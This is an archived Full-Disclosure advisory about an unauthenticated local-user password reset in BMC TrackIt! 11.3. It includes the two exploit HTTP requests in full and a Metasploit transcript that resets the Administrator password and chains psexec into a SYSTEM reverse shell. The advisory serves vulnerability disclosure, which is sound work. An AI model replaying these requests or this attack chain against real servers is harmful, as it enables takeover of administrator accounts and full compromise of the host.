| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAOJKFBArUvStqX9TdH8iSN1gdhU+miETKA7UETji7A877sUtAw@mail.gmail.com>
Date: Wed, 10 Dec 2014 19:40:02 -0600
From: Brandon Perry <bperry.volatile@...il.com>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] BMC TrackIt! Unauthenticated Arbitrary Local System User
Password Change
BMC TrackIt! 11.3 Unauthenticated Local User Password Change
Trial available here: http://www.trackit.com
A Metasploit pull request has been made here:
https://github.com/rapid7/metasploit-framework/pull/4359
BMC TrackIt! 11.3 when installed with TrackItWeb! allows an unauthenticated
user to change any local user's password, such as Administrator. If the
ability to log in remotely via SMB is enabled on the server, this can yield
an unauthenticated user a shell of SYSTEM using the psexec module in
Metasploit. This was tested against Windows Server 2008 R2 in a relatively
default (trackit installs SQL server) installation. A domain was set up and
the web server was added to the domain. Domain credentials were not able to
be set, only local users.
Using the Registration link in the top right of the
/PasswordReset/Application/Main page, the UI requires the user's password
to continue. However, the request made after to actually register the local
user is disparate from the authentication request and can be sent
independently. This allows an unauthenticated user to now reset that user's
password. Because the Password Reset form makes a separate distinct request
to check the answers to the secret question, the request to actually change
a user's password can be made as any user.
The first request looks like:
POST /PasswordReset/Application/Register HTTP/1.1
Host: 192.168.1.57
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0)
Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.57/PasswordReset
Content-Length: 318
Cookie: ASP.NET_SessionId=oyxdhg2obxlcxv30p2z0heot
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
domainname=WIN-P3AET0NFP1N&userName=Administrator&emailaddress=fdjhsahjfd%
40fdsafdsa.com
&userQuestions=[{"Id":1,"Answer":"not"},{"Id":2,"Answer":"not"}]&updatequesChk=false&SelectedQuestion=1&SelectedQuestion=2&answer=not&answer=not&confirmanswer=not&confirmanswer=not
A valid ASP.NET_SessionId is required in that a GET to the /PasswordReset/
and using the subsequent Set-Cookie in all subsequent requests as the
cookie. The domainname parameter can the the name of the computer, which is
the default value on the registration page. The userName parameter is the
user to register with the application. You can attempt this is with a user
already registered with no issue (though probably changing the secret
answers to known values is probably bad too).
The second request looks like this:
POST /PasswordReset/Application/ResetPassword HTTP/1.1
Host: 192.168.1.57
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0)
Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.57/PasswordReset/Application/Main
Content-Length: 92
Cookie: ASP.NET_SessionId=oyxdhg2obxlcxv30p2z0heot; UserName=Administrator
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
newPassword=n0tpassw0rd!&domain=WIN-P3AET0NFP1N&UserName=Administrator&CkbResetpassword=true
The domain and UserName parameters should match those supplied in the
previous registration request. The newPassword parameter will need to meet
any local standard enforced by GPO.
Combining these two requests will allow an unauthorised user to register a
local user to be elegible for a password reset via the password reset form,
then take advantage of the subsequent password reset vulnerability to
change the password of any local user, including Administrator.
Supplied is a metasploit auxiliary module which will change the password of
the Administrator user by default, then print the domain, username, and
password to user with psexec in order to log in over SMB.
The below Metasploit run details changing the password with the attached
module. Setting the password to the one reported by the auxiliary module,
psexec is run again and a shell as NT USER/SYSTEM is gained.
msf auxiliary(bmc_trackit_pwd_reset) > show options
Module options (auxiliary/gather/bmc_trackit_pwd_reset):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN no The domain of the user. By default
the local user's computer name will be autodetected
LOCALUSER Administrator yes The local user to change password
for
Proxies no Use a proxy chain
RHOST 192.168.1.57 yes The target address
RPORT 80 yes The target port
TARGETURI / yes The path to BMC TrackIt
VHOST no HTTP server virtual host
msf auxiliary(bmc_trackit_pwd_reset) > run
[*] Please run the psexec module using:
[*] WIN-P3AET0NFP1N\Administrator:qGSvnJeuNO!1
[*] Auxiliary module execution completed
msf auxiliary(bmc_trackit_pwd_reset) > use exploit/windows/smb/psexec
msf exploit(psexec) >
msf exploit(psexec) > set SMBPass qGSvnJeuNO!1
SMBPass => qGSvnJeuNO!1
msf exploit(psexec) > exploit
[*] Started reverse handler on 192.168.1.31:4444
[*] Connecting to the server...
[*] Authenticating to 192.168.1.57:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \fNRBQEMV.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@...cn_np:192.168.1.57[\svcctl]
...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@...cn_np:192.168.1.57[\svcctl]
...
[*] Obtaining a service manager handle...
[*] Creating a new service (NOAlMwJR - "MBvX")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \fNRBQEMV.exe...
[*] Sending stage (769024 bytes) to 192.168.1.57
[*] Meterpreter session 4 opened (192.168.1.31:4444 -> 192.168.1.57:50668)
at 2014-10-12 00:44:12 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists